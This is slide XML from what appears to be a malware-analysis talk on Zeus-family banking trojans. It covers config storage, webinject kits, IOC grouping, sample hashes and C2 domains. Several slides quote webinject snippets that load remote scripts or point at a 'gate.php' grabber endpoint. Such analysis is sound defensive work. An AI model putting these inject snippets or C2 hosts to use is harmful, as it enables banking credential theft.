              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ID (DWORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flags (DWORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size (DWORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Real size (DWORD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be compressed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zeus BinStorage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{287214EA-D0F3-AB45-AA91-99D682271AB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="1320015"/>
            <a:ext cx="6122137" cy="4036181"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21812700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868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects (Targeted Countries)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15CF3B1B-1F3C-5F43-ADC3-10790359269F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4103427057"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1376363"/>
          <a:ext cx="12192000" cy="48720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0312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868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects (Types)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15CF3B1B-1F3C-5F43-ADC3-10790359269F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1376363"/>
          <a:ext cx="10972800" cy="43513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F5C81C1E-51EC-144A-99A4-F673F04DDCC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3658139619"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1037430"/>
          <a:ext cx="12192000" cy="536336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41018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868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects (Defaults / Tests)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15CF3B1B-1F3C-5F43-ADC3-10790359269F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2046675898"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1143000"/>
          <a:ext cx="11125200" cy="5029199"/>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38CCD0B4-7126-324C-8CC7-E0B041350C50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143001"/>
            <a:ext cx="7206497" cy="5181600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="687730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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Snippet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>brows.inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(\"hxxps://taberfix[.top/panel/t.js\");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects Kits (tables)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F1250EA-DB2F-0942-A84D-00A2C068CA7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="739526"/>
            <a:ext cx="5357322" cy="4682299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="572995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Same Same But Different</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1015815-0154-8846-9944-E58A44E70424}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1066800"/>
            <a:ext cx="8267700" cy="5105400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1180161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6515"/>
            <a:ext cx="5486400" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Snippet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>home_link </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>= "hxxps://kioxixu.Abkhazia[.su/jpccgrab";var gate_link = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>home_link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>+"/gate.php";var pkey = "Bc5rw12";</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects Kits (.::grab)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5158D00E-BC86-EB49-A5C1-ECB20DFAB190}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="649842"/>
            <a:ext cx="5384953" cy="5078011"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="889633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6515"/>
            <a:ext cx="5486400" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Snippet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>src="hxxps://plsfgpal[.]com/mpgl/content/commbank/mx/commbank.js?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>r=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>'+((new Date()).getHours()+(new Date()).getDay()*24)+'"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects Kits (r=)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB253701-F2AD-6F40-BAB2-C5FB321D905E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556143" y="708819"/>
            <a:ext cx="5382010" cy="4703877"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1053858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Take Warning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Historical IOCs Ahead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2813611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Take Warning</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Historical IOCs Ahead</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2435452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dirty="0"/>
              <a:t>Delivery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malspam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit kit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Installation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Key hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Botnet name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dynamic config file hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Webinjects file hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Command and Control (Malware and Webinjects)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URI paths</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IPs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS common name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS fingerprint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Whois email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS SOA email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Actions on Objective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptocurrency IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Countries targeted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instant messaging IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Grouping</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3271378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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="274638"/>
            <a:ext cx="10972800" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Groups (IOC Overlap)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Chart 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A74452F-5714-4A4A-85CC-B3ED26BAE8B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3006055134"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1376514"/>
          <a:ext cx="12192000" cy="50242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246751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Groups (BaseConfig Key Hashes)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6248400" y="1676400"/>
          <a:ext cx="4224782" cy="3875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3558AD8-FE4F-5D49-9581-C204330E8110}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3552823321"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="12191999" cy="5029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02314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463" y="2286000"/>
            <a:ext cx="10972800" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1">
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Samples:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ~80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oldest: db790cbe0beb2a9c2749cb914fbdec8bdc7aa2ef3c9ca6c721e0c0fede715fb2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2: denatgruel.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Newest: 0c3dc58144b854493098c226abb4355dfb52d780c6422266c1c14ebbebc41836</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C2s: l6a9v8s6.top, l9l6m1w6.top, x8a9i1s7.top</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Activity:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> January 2016 – April 2018</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Versions:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2.1.0 – 2.6.6 (missing 14 versions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Botnets: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>newtest, vnc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Dynamic Config Filenames:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> newtest.dat. release1.dat, config.dat, configvnc.dat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>First debug build </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(April 2016)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
